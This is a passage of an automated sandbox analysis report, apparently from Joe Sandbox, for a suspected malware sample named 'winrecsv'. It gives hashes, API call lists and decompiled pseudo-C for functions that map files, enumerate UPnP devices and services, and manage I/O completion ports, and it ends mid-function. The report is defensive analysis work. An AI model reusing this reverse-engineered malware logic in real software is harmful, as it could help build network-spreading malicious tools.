                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0);
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_v8 = CreateFileW(0x414c40, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8);
                                                                                  				}
                                                                                  				E00409A90();
                                                                                  				_t41 =  *0x414e68; // 0x0
                                                                                  				return E0040BF50(_t41, 0, E00409960, 0, 0, 0);
                                                                                  			}












                                                                                  0x0040a02b
                                                                                  0x0040a031
                                                                                  0x0040a043
                                                                                  0x0040a05f
                                                                                  0x0040a064
                                                                                  0x0040a040
                                                                                  0x0040a040
                                                                                  0x0040a083
                                                                                  0x0040a08a
                                                                                  0x0040a0a4
                                                                                  0x0040a0ab
                                                                                  0x0040a0c3
                                                                                  0x0040a0ca
                                                                                  0x0040a0d8
                                                                                  0x0040a0db
                                                                                  0x0040a0e2
                                                                                  0x0040a0fd
                                                                                  0x0040a12a
                                                                                  0x0040a12f
                                                                                  0x0040a0f1
                                                                                  0x0040a0fa
                                                                                  0x0040a0fa
                                                                                  0x0040a138
                                                                                  0x0040a138
                                                                                  0x0040a142
                                                                                  0x0040a142
                                                                                  0x0040a14c
                                                                                  0x0040a14c
                                                                                  0x0040a152
                                                                                  0x0040a164
                                                                                  0x0040a175

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNEL32(00414C40,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 439099756-0
                                                                                  • Opcode ID: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW(0x414620, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}













                                                                                  0x0040420b
                                                                                  0x00404225
                                                                                  0x0040422b
                                                                                  0x00404232
                                                                                  0x0040424c
                                                                                  0x00404253
                                                                                  0x0040431b
                                                                                  0x00000000
                                                                                  0x0040431f
                                                                                  0x0040426b
                                                                                  0x00404272
                                                                                  0x00404311
                                                                                  0x00404315
                                                                                  0x00000000
                                                                                  0x00404315
                                                                                  0x00404284
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x0040429a
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042aa
                                                                                  0x004042b1
                                                                                  0x004042be
                                                                                  0x004042ca
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x00404302
                                                                                  0x00000000
                                                                                  0x00404302
                                                                                  0x004042d0
                                                                                  0x00000000
                                                                                  0x004042d5
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x0040430b
                                                                                  0x00000000
                                                                                  0x0040430b
                                                                                  0x00404328

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNEL32(00414620,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 3956458805-0
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"deviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cc96
                                                                                  0x0040cc9d
                                                                                  0x0040cca7
                                                                                  0x0040ccb0
                                                                                  0x0040ccb8
                                                                                  0x0040ccc8
                                                                                  0x0040ccda
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x0040ccd7
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd54
                                                                                  0x0040cd5f
                                                                                  0x0040cd64
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdd1
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cdd3
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040ccda
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"serviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cab6
                                                                                  0x0040cabd
                                                                                  0x0040cac7
                                                                                  0x0040cad0
                                                                                  0x0040cad8
                                                                                  0x0040cae8
                                                                                  0x0040cafa
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x0040caf7
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb74
                                                                                  0x0040cb7f
                                                                                  0x0040cb84
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbf1
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cbf3
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cafa
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E330(intOrPtr __eax, void* _a4) {
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t20;
                                                                                  				long _t28;
                                                                                  				long _t37;
                                                                                  				intOrPtr _t45;
                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                  				long _t49;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t53 = _a4;
                                                                                  				_t45 = __eax;
                                                                                  				if(_t53 != 0xffffffff) {
                                                                                  					_t48 = __eax + 0x20;
                                                                                  					_t37 = 0;
                                                                                  					EnterCriticalSection(_t48);
                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                  					if(_t20 != 0) {
                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                  							if(_t20 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  							}
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t37 = 1;
                                                                                  					}
                                                                                  					L7:
                                                                                  					LeaveCriticalSection(_t48);
                                                                                  					if(_t37 == 0) {
                                                                                  						_t49 = E00408E40(0x284);
                                                                                  						_t55 = _t54 + 4;
                                                                                  						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}













                                                                                  0x0040e331
                                                                                  0x0040e336
                                                                                  0x0040e33b
                                                                                  0x0040e344
                                                                                  0x0040e348
                                                                                  0x0040e34a
                                                                                  0x0040e350
                                                                                  0x0040e355
                                                                                  0x0040e357
                                                                                  0x0040e35f
                                                                                  0x0040e367
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e369
                                                                                  0x00000000
                                                                                  0x0040e367
                                                                                  0x0040e36b
                                                                                  0x0040e36b
                                                                                  0x0040e36d
                                                                                  0x0040e36e
                                                                                  0x0040e376
                                                                                  0x0040e389
                                                                                  0x0040e38b
                                                                                  0x0040e390
                                                                                  0x0040e42d
                                                                                  0x0040e42e
                                                                                  0x0040e43c
                                                                                  0x0040e396
                                                                                  0x0040e39b
                                                                                  0x0040e3a3
                                                                                  0x0040e3a9
                                                                                  0x0040e3af
                                                                                  0x0040e3b7
                                                                                  0x0040e3d4
                                                                                  0x0040e423
                                                                                  0x0040e428
                                                                                  0x0040e42b
                                                                                  0x00000000
                                                                                  0x0040e3d6
                                                                                  0x0040e3d6
                                                                                  0x0040e3dc
                                                                                  0x0040e3e0
                                                                                  0x0040e3e6
                                                                                  0x0040e3ec
                                                                                  0x0040e3f0
                                                                                  0x0040e3f6
                                                                                  0x0040e400
                                                                                  0x0040e406
                                                                                  0x0040e410
                                                                                  0x0040e416
                                                                                  0x0040e421
                                                                                  0x0040e421
                                                                                  0x0040e3d4
                                                                                  0x0040e378
                                                                                  0x0040e37e
                                                                                  0x0040e37e
                                                                                  0x0040e33e
                                                                                  0x0040e341
                                                                                  0x0040e341

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
